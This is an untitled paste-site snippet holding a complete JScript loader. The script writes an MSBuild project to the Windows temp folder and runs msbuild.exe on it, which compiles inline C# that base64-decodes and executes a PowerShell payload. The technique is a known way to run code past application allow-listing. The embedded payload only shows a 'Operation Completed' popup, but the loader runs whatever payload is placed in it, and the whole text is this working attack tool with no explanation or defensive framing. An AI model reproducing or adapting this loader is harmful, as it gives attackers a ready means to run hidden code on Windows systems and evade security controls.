Untitled

unknown
plain_text
19 days ago
3.6 kB
Indexable
Never
<script language="javascript">
    var objFSO = new ActiveXObject("Scripting.FileSystemObject");
    var objShell = new ActiveXObject("WScript.Shell");
    var objWindir = objShell.ExpandEnvironmentStrings("%windir%");
    var objTemp = objShell.ExpandEnvironmentStrings("%TEMP%") + "\\resource.xml";
    var payload = "JHdzaGVsbCA9IE5ldy1PYmplY3QgLUNvbU9iamVjdCBXc2NyaXB0LlNoZWxsCiR3c2hlbGwuUG9wdXAoIk9wZXJhdGlvbiBDb21wbGV0ZWQiLDAsIkRvbmUiLDB4MSk=";
            //objShell.Run("%COMSPEC% /c ping -n 60 127.0.0.1>nul", 0, 1);
            CreateMSBuildXML();
            objShell.Run(objWindir + "\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe %TEMP%\\resource.xml", 0);
            
    
    
    function CreateMSBuildXML(uniArray, x) {
    
        var msbuildXML = "<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">" +
        "  <Target Name=\"npscsharp\">" +
        "   <nps />" +
        "  </Target>" +
        "  <UsingTask" +
        "    TaskName=\"nps\"" +
        "    TaskFactory=\"CodeTaskFactory\"" +
        "    AssemblyFile=\"C:\\Windows\\Microsoft.Net\\Framework\\\\v4.0.30319\\Microsoft.Build.Tasks.v4.0.dll\" >" +
        "  <Task>" +
        "    <Reference Include=\"System.Management.Automation\" />" +
        "      <Code Type=\"Class\" Language=\"cs\">" +
        "        <![CDATA[" +
        "" +
        "          using System;" +
        "      using System.Collections.ObjectModel;" +
        "      using System.Management.Automation;" +
        "      using System.Management.Automation.Runspaces;" +
        "      using Microsoft.Build.Framework;" +
        "      using Microsoft.Build.Utilities;" +
        "" +
        "      public class nps : Task, ITask" +
        "        {" +
        "            public override bool Execute()" +
        "            {" +
        "              string cmd = \""+ payload +"\";" +
        "" +
        "                PowerShell ps = PowerShell.Create();" +
        "                ps.AddScript(Base64Decode(cmd));" +
        "" +
        "                Collection<PSObject> output = null;" +
        "                try" +
        "                {" +
        "                    output = ps.Invoke();" +
        "                }" +
        "                catch(Exception e)" +
        "                {" +
        "                    Console.WriteLine(\"Error while executing the script.\\\\r\\\\n\" + e.Message.ToString());" +
        "                }" +
        "                if (output != null)" +
        "                {" +
        "                    foreach (PSObject rtnItem in output)" +
        "                    {" +
        "                        Console.WriteLine(rtnItem.ToString());" +
        "                    }" +
        "                }" +
        "                return true;" +
        "            }" +
        "" +
        "            public static string Base64Encode(string text) {" +
        "           return System.Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(text));" +
        "        }" +
        "" +
        "        public static string Base64Decode(string encodedtext) {" +
        "            return System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(encodedtext));" +
        "        }" +
        "        }" +
        "        ]]>" +
        "      </Code>" +
        "    </Task>" +
        "  </UsingTask>" +
        "</Project>";
        var objFile = objFSO.CreateTextFile(objTemp,true);
        objFile.WriteLine(msbuildXML);
        objFile.Close();
    }
    </script>